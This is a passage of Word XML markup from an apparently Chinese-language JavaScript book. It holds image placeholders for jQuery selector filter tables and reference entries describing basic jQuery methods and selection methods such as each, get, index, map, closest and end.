            </wp:positionV>
            <wp:extent cx="1384539" cy="491705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="111" name="00111.jpeg" descr="00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1.jpeg" descr="00111.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1384539" cy="491705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251767808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2113471" cy="905773"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="112" name="00112.jpeg" descr="00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2.jpeg" descr="00112.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2113471" cy="905773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素类型过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251768832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2411083" cy="370935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="113" name="00113.jpeg" descr="00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3.jpeg" descr="00113.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2411083" cy="370935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素状态过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251769856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2458528" cy="267418"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="114" name="00114.jpeg" descr="00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4.jpeg" descr="00114.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2458528" cy="267418"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择位置过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251770880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2436962" cy="284671"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="115" name="00115.jpeg" descr="00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5.jpeg" descr="00115.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2436962" cy="284671"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档位置过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251771904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2622430" cy="500332"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="116" name="00116.jpeg" descr="00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6.jpeg" descr="00116.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2622430" cy="500332"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>其他过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251772928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2087592" cy="159588"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="117" name="00117.jpeg" descr="00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7.jpeg" descr="00117.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2087592" cy="159588"/>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73952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2096218" cy="288984"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="118" name="00118.jpeg" descr="00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8.jpeg" descr="00118.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2096218" cy="288984"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>基本</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法及属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的基本方法和属性。它们不会改变选项或选中的元素，只是允许查询或迭代这个选中元素的集合。细节请参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>进行选择的上下文本或根节点。它是</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数，若不指定则是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>each(f(idx,elt))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每一个选中元素的方法并调用一次。如果该函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>则停止迭代。返回调用它的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get(idx):elt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get():array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中指定索引的选中元素。也可以使用常规的方括号数组索引。如果没有参数，则</w:t>
      </w:r>
      <w:r>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toArray()</w:t>
      </w:r>
      <w:r>
        <w:t>功能一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>index():int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>index(sel):int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>index(elt):int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数，则返回第一个选中的元素在它的兄弟节点中的索引。如果带一个选择器参数，返回匹配选择器</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>的元素集合中第一个选中元素的索引，如果没有找到对应元素则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。如果带一个元素参数，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>elt</w:t>
      </w:r>
      <w:r>
        <w:t>在选中元素中的索引，如果没有找到对应元素则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>is(sel):boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果至少有</w:t>
      </w:r>
      <w:r>
        <w:t>一个选中元素也匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选中元素的数目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>map(f(idx,elt)):jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每一个选中元素的方法并调用一次，返回一个保存返回值的新</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，其中值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的将省略，并且数组值是平整的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>selector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最初传给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>的选择字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>size():int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toArray():array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将选中元素作为一个真实的数组返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿描述的方法将改变选中元素的集合，通过对它们的过滤，可</w:t>
      </w:r>
      <w:r>
        <w:t>能会添加新的元素，或者将选中元素作为一个新的选择的起点。在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>及之后的版本中，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择结果总是按文档中的顺序排序并且不包含重复元素。参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>add(sel,[context])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>add(elts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>add(html)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>的参数将传入</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>，返回的选择结果将与当前选择结果合并。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>andSelf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将前一个选中的元素集合（从栈中）添加到当前选择结果中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>children([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择选中元素的子节点。如果不指明参数则选中所有子节点。如果指明一个选择器，则只选择匹配的子节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>closest(sel,[context])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择离每一个已选择元素最近的祖先元素，这些元素匹配</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>并且是</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>的子孙元素。如果省略</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>，将会使用对应的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>contents()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择每一个选中元素的全部子节点，包括文本节点及注释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
